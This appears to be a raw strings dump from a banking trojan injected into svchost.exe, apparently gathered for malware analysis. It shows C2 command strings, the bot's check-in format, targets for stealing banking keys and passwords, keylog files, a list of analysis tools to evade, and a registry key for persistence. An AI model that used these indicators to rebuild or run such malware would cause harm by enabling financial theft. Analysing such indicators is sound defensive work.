Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
NETWORKSERVICE!XP1!F9BE9A8A
NETWORKSERVICE!XP1!F9BE9A8A
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.fffffe00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.ffffff00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MAPPING.fffffd00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.fffffe00
MSCTF.Shared.MUTEX.ffffff00
MSCTF.Shared.MUTEX.ffffff00
%Documents and Settings%\NetworkService\Application Data\
%Documents and Settings%\NetworkService\Application Data\
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1184_rwx_00C30000_0005B000:
.text
.text
`.data
`.data
.reloc
.reloc
`.rdata
`.rdata
@.data
@.data
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
/login.php
/login.php
ntdll.dll
ntdll.dll
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8249-4fe1-9A0D-92CD3CC22014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\{EAF799BF-8449-4fe1-9A0D-95CD39DC2014}
Global\HighMemoryEvent_x
Global\HighMemoryEvent_x
explorer.exe
explorer.exe
1.2.5
1.2.5
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
- zip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
unzip 1.01 Copyright 1998-2004 Gilles Vollant - hXXp://VVV.winimage.com/zLibDll
Winmm.dll
Winmm.dll
Kernel32.dll
Kernel32.dll
Gdi32.dll
Gdi32.dll
hXXp://
hXXp://
hXXps://
hXXps://
HTTP/1.
HTTP/1.
nspr4.dll
nspr4.dll
PR_OpenTCPSocket
PR_OpenTCPSocket
[[[URL: %s
[[[URL: %s
Process: %s
Process: %s
User-agent: %s]]]
User-agent: %s]]]
{{{%s
{{{%s
Crypt32.dll
Crypt32.dll
CertVerifyCertificateChainPolicy
CertVerifyCertificateChainPolicy
Wininet.dll
Wininet.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestW
HttpSendRequestW
HttpSendRequestExA
HttpSendRequestExA
HttpSendRequestExW
HttpSendRequestExW
set_url
set_url
microsoft.public.win32.programmer.kernel
microsoft.public.win32.programmer.kernel
\iexplore.exe
\iexplore.exe
keygrab
keygrab
u.bmp
u.bmp
\\.\PhysicalDrive%u
\\.\PhysicalDrive%u
/topic.php
/topic.php
keylog.txt
keylog.txt
passwords.txt
passwords.txt
%s%u.zip
%s%u.zip
Content-Disposition: form-data; name="file"; filename="report"
Content-Disposition: form-data; name="file"; filename="report"
HTTP/1.0
HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Referer: hXXp://VVV.google.com
Referer: hXXp://VVV.google.com
Content-Type: multipart/form-data; boundary=---------------------------%s
Content-Type: multipart/form-data; boundary=---------------------------%s
VVV.bing.com
VVV.bing.com
VVV.microsoft.com
VVV.microsoft.com
frd.exe
frd.exe
command=config&update_url=
command=config&update_url=
/search.php
/search.php
&port=
&port=
command=load&url=
command=load&url=
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0001
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0002
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
SYSTEM\CurrentControlSet\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0003
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
hid=%s&username=SYSTEM&compname=%s&bot_version=4.4.10&uptime=%u&os=u&local_time=%s%d&token=%d&socks_port=%u&hardware[display]=%s&hardware[driver_av]=%s
\chrome.exe
\chrome.exe
\svchost.exe
\svchost.exe
\java.exe
\java.exe
\javaw.exe
\javaw.exe
\javaws.exe
\javaws.exe
\opera.exe
\opera.exe
\firefox.exe
\firefox.exe
\maxthon.exe
\maxthon.exe
\avant.exe
\avant.exe
\mnp.exe
\mnp.exe
\safari.exe
\safari.exe
\netscape.exe
\netscape.exe
\tbb-firefox.exe
\tbb-firefox.exe
\frd.exe
\frd.exe
\isclient.exe
\isclient.exe
\ipc_full.exe
\ipc_full.exe
\intpro.exe
\intpro.exe
\cbsmain.dll
\cbsmain.dll
\clmain.exe
\clmain.exe
\core.exe
\core.exe
\rundll32.exe
\rundll32.exe
\notepad.exe
\notepad.exe
\cbank.exe
\cbank.exe
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
iexplore.exe|opera.exe|java.exe|javaw.exe|explorer.exe|isclient.exe|intpro.exe|ipc_full.exe|mnp.exe|cbsmain.dll|firefox.exe|clmain.exe|core.exe|maxthon.exe|avant.exe|safari.exe|svchost.exe|chrome.exe|notepad.exe|rundll32.exe|netscape.exe|tbb-firefox.exe|frd.exe|cbank.exe|
%s.dbf
%s.dbf
%s.DBF
%s.DBF
j_password=
j_password=
pass.log
pass.log
command=auth_loginByPassword&back_command=&back_custom1=&
command=auth_loginByPassword&back_command=&back_custom1=&
edClientLogin=
edClientLogin=
edUserLogin=
edUserLogin=
edPassword=
edPassword=
&LOGIN_AUTHORIZATION_CODE=
&LOGIN_AUTHORIZATION_CODE=
login=
login=
password=
password=
pass_
pass_
advapi32.dll
advapi32.dll
path.txt
path.txt
keys.zip
keys.zip
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}
%s\d.bmp
%s\d.bmp
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AA53E2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}
keys
keys
private.txt
private.txt
public.txt
public.txt
\*.key
\*.key
\self.cer
\self.cer
self.cer
self.cer
self.pub
self.pub
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
ctunnel.exe
ctunnel.exe
ctunnel.zip
ctunnel.zip
path_ctunnel.txt
path_ctunnel.txt
header.key
header.key
keys99
keys99
\header.key
\header.key
masks2.key
masks2.key
\masks2.key
\masks2.key
masks.key
masks.key
\masks.key
\masks.key
\name.key
\name.key
primary2.key
primary2.key
\primary2.key
\primary2.key
primary.key
primary.key
\primary.key
\primary.key
keys99.zip
keys99.zip
path99.txt
path99.txt
bsi.dll
bsi.dll
&domain=letitbit.net&
&domain=letitbit.net&
cc.txt
cc.txt
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
prv_key.pfx
prv_key.pfx
keys\
keys\
sign.cer
sign.cer
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAFEE2BF-8989-4fe1-9A0D-95CD39DC0A14}
sks2xyz.dll
sks2xyz.dll
vb_pfx_import
vb_pfx_import
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC0214}
secret.key
secret.key
pubkeys.key
pubkeys.key
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}
path1.txt
path1.txt
inter.zip
inter.zip
interpro.ini
interpro.ini
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{EAF329BF-8989-4fe1-9A0D-95CD39DC0214}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
Local\{AAF733BF-8989-4fe1-9A0D-95CD39DC0A14}
cbsmain.dll
cbsmain.dll
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}
pass.txt
pass.txt
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF799BF-8989-4fe1-9A0D-95CD777C0214}
FilialRCon.dll
FilialRCon.dll
ISClient.cfg
ISClient.cfg
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}
rfk.zip
rfk.zip
client.zip
client.zip
path_client.txt
path_client.txt
path_keys.txt
path_keys.txt
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}
Agava_Client.exe
Agava_Client.exe
KeysDiskPath
KeysDiskPath
Agava_Client.ini
Agava_Client.ini
Agava_keys
Agava_keys
keys_path.txt
keys_path.txt
mespro.dll
mespro.dll
AddPSEPrivateKeyEx
AddPSEPrivateKeyEx
core.exe
core.exe
data\id.dbf
data\id.dbf
\data\id.dbf
\data\id.dbf
keys%i.zip
keys%i.zip
path%i.txt
path%i.txt
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
Software\Microsoft\Windows NT\CurrentVersion\Winlogon
winmm.dll
winmm.dll
%s\%s
%s\%s
LibVNCServer 0.9.7
LibVNCServer 0.9.7
%s (%s)
%s (%s)
d/d/d d:d
d/d/d d:d
password check failed!
password check failed!
WinSCard.dll
WinSCard.dll
SensApi.dll
SensApi.dll
GetTcpTable
GetTcpTable
IPHLPAPI.DLL
IPHLPAPI.DLL
dbghelp.dll
dbghelp.dll
MSVCRT.dll
MSVCRT.dll
PSAPI.DLL
PSAPI.DLL
NETAPI32.dll
NETAPI32.dll
DNSAPI.dll
DNSAPI.dll
HttpQueryInfoA
HttpQueryInfoA
HttpAddRequestHeadersW
HttpAddRequestHeadersW
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpOpenRequestA
WININET.dll
WININET.dll
WS2_32.dll
WS2_32.dll
ShellExecuteA
ShellExecuteA
SHFileOperationA
SHFileOperationA
SHELL32.dll
SHELL32.dll
SHLWAPI.dll
SHLWAPI.dll
GetSystemWindowsDirectoryA
GetSystemWindowsDirectoryA
GetProcessHeap
GetProcessHeap
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
MapVirtualKeyW
MapVirtualKeyW
SetKeyboardState
SetKeyboardState
EnumChildWindows
EnumChildWindows
GetKeyboardState
GetKeyboardState
MsgWaitForMultipleObjects
MsgWaitForMultipleObjects
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegEnumKeyExA
RegEnumKeyExA
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
ADVAPI32.dll
ADVAPI32.dll
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
MSCTF.Shared.MAPPING.%x
MSCTF.Shared.MAPPING.%x
Desk_%u%x
Desk_%u%x
MSCTF.Shared.MUTEX.%x
MSCTF.Shared.MUTEX.%x
.Prev
.Prev
.current
.current
1-191j1w1}1
1-191j1w1}1
?"?(?-?~?
?"?(?-?~?
;-;5;=;^;|;
;-;5;=;^;|;
7"7)7\7~7
7"7)7\7~7
6 6$6(6,6064686
6 6$6(6,6064686
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
svchost.exe_1184_rwx_00C90000_0006A000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
http
http
PSShL
PSShL
SSShp
SSShp
tUSSSh
tUSSSh
SSShp;
SSShp;
SSSh0
SSSh0
SSShpk
SSShpk
SSShpF
SSShpF
t9SSSh
t9SSSh
u1SSShP
u1SSShP
name.key
name.key
\secrets.key
\secrets.key
sign.key
sign.key
kernel32.dll
kernel32.dll
\explorer.exe
\explorer.exe
user32.dll
user32.dll
multi_pot.exe
multi_pot.exe
HookExplorer.exe
HookExplorer.exe
proc_analyzer.exe
proc_analyzer.exe
sckTool.exe
sckTool.exe
sniff_hit.exe
sniff_hit.exe
sysAnalyzer.exe
sysAnalyzer.exe
idag.exe
idag.exe
ollydbg.exe
ollydbg.exe
dumpcap.exe
dumpcap.exe
wireshark.exe
wireshark.exe
C:\iDEFENSE
C:\iDEFENSE
\\.\NPF_NdisWanIp
\\.\NPF_NdisWanIp
avp.exe
avp.exe
Software\Microsoft\Windows NT\CurrentVersion
Software\Microsoft\Windows NT\CurrentVersion
%s!%s!X
%s!%s!X
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows nt\currentversion\winlogon
software\microsoft\windows\currentversion\run
software\microsoft\windows\currentversion\run
\winlogon.exe
\winlogon.exe
sysinfo.log
sysinfo.log
scr.bmp
scr.bmp
minidump.bin
minidump.bin
%d.%d.%d.%d
%d.%d.%d.%d
à %dh %dm
à %dh %dm
%s:%d
%s:%d
Software\Microsoft\Internet Explorer\TypedURLs
Software\Microsoft\Internet Explorer\TypedURLs
url%i
url%i
4.4.10
4.4.10
%dx%d@%d
%dx%d@%d
%c%d:d
%c%d:d
{Windows directory:
{Windows directory:
links.log
links.log
\History.IE5\index.dat
\History.IE5\index.dat
\Opera\Opera\typed_history.xml
\Opera\Opera\typed_history.xml
avast.com
avast.com
93.191.13.100
93.191.13.100
drweb
drweb
eset.com
eset.com
z-oleg.com
z-oleg.com
kltest.org.ru
kltest.org.ru
.comodo.com
.comodo.com
google.com
google.com
Dnsapi.dll
Dnsapi.dll
ws2_32.dll
ws2_32.dll
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
